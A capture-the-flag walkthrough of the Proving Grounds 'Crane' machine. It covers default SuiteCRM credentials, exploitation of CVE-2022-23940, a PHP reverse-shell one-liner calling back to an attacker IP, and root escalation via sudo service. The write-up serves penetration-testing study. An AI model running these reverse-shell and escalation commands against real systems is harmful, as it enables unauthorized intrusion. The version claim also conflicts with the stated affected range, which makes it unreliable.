Introduction

In this walkthrough, we explore the “Crane” machine from OffSec’s Proving Grounds. This walkthrough demonstrates the importance of thorough enumeration and leveraging known vulnerabilities for exploitation.

OSCP Study Notes

HackTheBox Certified Penetration Testing Specialist Study Notes

Port Scanning

We initiate with an Nmap scan to identify open ports:

33060/tcp: MySQLX

22/tcp: SSH

80/tcp: HTTP

3306/tcp: MySQL

Web Enumeration

Accessing port 80 reveals a SuiteCRM login page. During the evaluation, a critical security flaw was identified: the SuiteCRM instance allowed administrative access using the default credentials, admin:admin.

This vulnerability arises from the common oversight of failing to update default login details post-installation, leaving the system highly susceptible to unauthorized access and potential exploitation. Addressing such weaknesses is essential to enhance the overall security posture.

Exploitation

Version 7.12.3 of SuiteCRM is vulnerable to CVE-2022-23940, allowing remote code execution.

CVE-2022-23940

CVE-2022-23940 is a critical security vulnerability identified in SuiteCRM versions up to 7.12.1 and 8.x up to 8.0.1. This flaw allows authenticated users with access to the Scheduled Reports module to execute arbitrary code on the server by exploiting PHP deserialization in the email_recipients property.

Technical Details:

The vulnerability arises from improper handling of serialized data in the email_recipients field. Attackers can craft a malicious report containing a PHP deserialization payload in this field. When the report is accessed, the backend deserializes the content, leading to the execution of the payload. This can be exploited using PHP deserialization gadgets, such as Monolog/RCE1 from phpggc, to achieve remote code execution.

Impact:

Exploitation of this vulnerability can compromise the confidentiality, integrity, and availability of the affected system. The National Vulnerability Database (NVD) has assigned it a CVSS score of 8.8, categorizing it as a high-severity issue.

We utilize a publicly available exploit from GitHub, crafting a PHP reverse shell payload:

php -r '$sock=fsockopen("192.168.45.231", 4545);exec("/bin/sh -i <&3 >&3 2>&3");'

python3 exploit.py -h http://192.168.249.146 -u admin -p admin — payload "php -r '$sock=fsockopen(\"192.168.45.231\", 4545);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Executing the exploit grants us a reverse shell.

Privilege Escalation Via Sudo

Running sudo -l reveals we can execute /usr/sbin/service without a password. By executing:

sudo /usr/sbin/service /////bin/bash

The multiple slashes (/////) in the command are generally ignored by the filesystem. They might be used to obfuscate the command or to attempt bypassing path interpretation checks. The key aspect of the exploitation is forcing the service command to execute /bin/bash with elevated (root) privileges.

When the command is executed:

sudo /usr/sbin/service /////bin/bash

It triggers the service utility to interpret /bin/bash as its target, effectively launching a new shell session with root privileges. This grants full access to the system as the root user, enabling privilege escalation.

We obtain a root shell. Navigating to the root directory, we access the proof.txt file, completing the challenge.

Overview of SuiteCRM

SuiteCRM is an open-source Customer Relationship Management (CRM) software designed to help businesses manage their relationships with customers, streamline processes, and enhance sales and marketing efforts. It is a free alternative to proprietary CRM platforms such as Salesforce, providing similar functionality without licensing costs.

Key Features of SuiteCRM:

  1. Contact Management: Centralized repository for storing customer data, including contact details, interactions, and preferences.
  2. Sales Management: Tools to track leads, opportunities, and the sales pipeline, allowing businesses to forecast revenue and manage sales strategies.
  3. Marketing Automation: Campaign management tools to execute email marketing, track campaign performance, and generate leads.
  4. Customer Support: Case management, ticketing systems, and customer service workflows for handling support queries.
  5. Workflow Automation: Custom workflows to automate repetitive tasks and improve efficiency.
  6. Customizable Dashboards: Visualize key metrics, such as sales performance and customer engagement, with tailored dashboards.
  7. Reporting and Analytics: Generate detailed reports to gain insights into business performance and customer behavior.

Advantages of SuiteCRM:

  • Open Source: Free to use, modify, and distribute, making it highly customizable.
  • Community Support: Backed by a robust community that actively contributes to development and support.
  • Integration: Compatible with other software systems, such as email platforms and third-party applications.
  • Scalability: Suitable for businesses of all sizes, from startups to large enterprises.

Use Cases:

  • Small businesses looking for cost-effective CRM solutions.
  • Organizations needing customizable workflows and reports.
  • Enterprises that prefer hosting their CRM on-premise for better control over data security.

Deployment Options:

  • On-Premise: Installed on the company’s servers, giving full control over data and customizations.
  • Cloud-Based: Hosted in the cloud for easy access and minimal maintenance.
,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles